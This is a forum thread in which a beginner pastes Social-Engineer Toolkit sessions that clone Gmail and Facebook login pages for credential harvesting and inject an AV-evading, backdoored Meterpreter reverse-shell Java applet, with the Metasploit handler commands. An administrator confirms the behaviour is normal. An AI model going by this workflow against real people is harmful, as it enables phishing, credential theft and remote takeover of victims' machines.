
Thread: Can't get SET to work...

  1. #1
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    1

    Can't get SET to work...

    Hi there! I'm having some issues with SET. I'm still learning, but couldn't find the problem by myself.



    1. The Java Applet Attack Method
    2. The Metasploit Browser Exploit Method
    3. Credential Harvester Attack Method
    4. Tabnabbing Attack Method
    5. Man Left in the Middle Attack Method
    6. Web Jacking Attack Method
    7. Multi-Attack Web Method
    8. Create or import a CodeSigning Certificate
    9. Return to the previous menu

    Enter your choice (press enter for default): 3



    [!] Website Attack Vectors [!]

    1. Web Templates
    2. Site Cloner
    3. Custom Import
    4. Return to main menu

    Enter number (1-4): 1

    Email harvester will allow you to utilize the clone capabilities within SET
    to harvest credentials or parameters from a website as well as place them into a report.



    Select a template to utilize within the web clone attack

    1. Java Required
    2. Gmail
    3. Google
    4. Facebook
    5. Twitter

    Enter the one to use: 2
    [*] Cloning the website: https://gmail.com
    [*] This could take a little bit...

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [*] I have read the above message.[*]

    Press {return} to continue.
    [*] Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:

    --------------------------------------------------------------------------------------------------------------

    It just ends there; the payload options (msfconsole) never appear.

    2) In this case the msfconsole displays well, but I don't know where the "java applet" is stored to be sent.

    [---] The Social-Engineer Toolkit (SET) [---]
    [---] Written by: David Kennedy (ReL1K) [---]
    [---] Development Team: Thomas Werth [---]
    [---] Development Team: JR DePre (pr1me) [---]
    [---] Version: 1.5.2 [---]
    [---] Codename: 'Convergence Edition' [---]
    [---] Report bugs to: davek@social-engineer.org [---]
    [---] Follow me on Twitter: dave_rel1k [---]
    [---] Homepage: http://www.secmaniac.com [---]
    [---] Framework: http://www.social-engineer.org [---]

    Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

    DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

    Select from the menu:

    1. Spear-Phishing Attack Vectors
    2. Website Attack Vectors
    3. Infectious Media Generator
    4. Create a Payload and Listener
    5. Mass Mailer Attack
    6. Teensy USB HID Attack Vector
    7. SMS Spoofing Attack Vector
    8. Wireless Access Point Attack Vector
    9. Third Party Modules
    10. Update the Metasploit Framework
    11. Update the Social-Engineer Toolkit
    12. Help, Credits, and About
    13. Exit the Social-Engineer Toolkit

    Enter your choice: 2



    [!] Website Attack Vectors [!]

    1. Web Templates
    2. Site Cloner
    3. Custom Import
    4. Return to main menu

    Enter number (1-4): 1


    Select a template to utilize within the web clone attack

    1. Java Required
    2. Gmail
    3. Google
    4. Facebook
    5. Twitter

    Enter the one to use: 4
    [*] UPX packer not found in the pathname specified in config. Disabling UPX packing for executable!
    What payload do you want to generate:

    Name: Description:

    1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
    2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
    3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
    4. Windows Bind Shell Execute payload and create an accepting port on remote system.
    5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
    6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
    7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
    8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
    9. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
    10. Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
    11. SET Custom Written Interactive Shell This is the new custom interactive reverse shell designed for SET
    12. RATTE HTTP Tunneling Payload This is a security bypass payload that will tunnel all comms over HTTP
    13. Import your own executable Specify a path for your own executable

    Enter choice (hit enter for default): 2

    Below is a list of encodings to try and bypass AV.

    Select one of the below, 'backdoored executable' is typically the best.

    1. avoid_utf8_tolower (Normal)
    2. shikata_ga_nai (Very Good)
    3. alpha_mixed (Normal)
    4. alpha_upper (Normal)
    5. call4_dword_xor (Normal)
    6. countdown (Normal)
    7. fnstenv_mov (Normal)
    8. jmp_call_additive (Normal)
    9. nonalpha (Normal)
    10. nonupper (Normal)
    11. unicode_mixed (Normal)
    12. unicode_upper (Normal)
    13. alpha2 (Normal)
    14. No Encoding (None)
    15. Multi-Encoder (Excellent)
    16. Backdoored Executable (BEST)

    Enter your choice (enter for default): 16
    [-] Enter the PORT of the listener (enter for default): 443

    [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
    [-] Backdoor completed successfully. Payload is now hidden within a legit executable.
    [*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
    [!] UPX was not detected. Try configuring the set_config again.
    [*] Digital Signature Stealing is ON, hijacking a legit digital certificate.

    ********************************************************
    Do you want to create a Linux/OSX reverse_tcp payload
    in the Java Applet attack as well?
    ********************************************************

    Enter choice yes or no: no
    [*] Cloning the website: http://www.facebook.com
    [*] This could take a little bit...
    [*] Injecting Java Applet attack into the newly cloned website.
    [*] Filename obfuscation complete. Payload name is: p07CxXqUkR
    [*] Malicious java applet website prepped for deployment


    ***************************************************
    Web Server Launched. Welcome to the SET Web Attack.
    ***************************************************

    [--] Tested on IE6, IE7, IE8, IE9, Safari, Chrome, and FireFox [--]
    [*] Launching MSF Listener...
    [*] This may take a few to load MSF...
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***

    _
    | | o
    _ _ _ _ _|_ __, , _ | | __ _|_
    / |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
    | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
    /|
    \|


    =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
    + -- --=[ 710 exploits - 359 auxiliary - 57 post
    + -- --=[ 225 payloads - 27 encoders - 8 nops
    =[ svn r13097 updated today (2011.07.05)

    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j
    [*] Exploit running as background job.
    msf exploit(handler) >
    [*] Started reverse handler on 0.0.0.0:443
    [*] Starting the payload handler...




    I'm sorry if this is a really stupid post or question, but I'm trying to learn how this works. THX!!!

  2. #2
    Administrator sickness
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Re: Can't get SET to work...

    I would suggest you get more familiar with what SET does and how it does it before actually using the tool.

    Every behavior you described there is normal: the credential harvester doesn't need any msf payloads, and you need to browse the malicious site for the java applet to kick in.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !
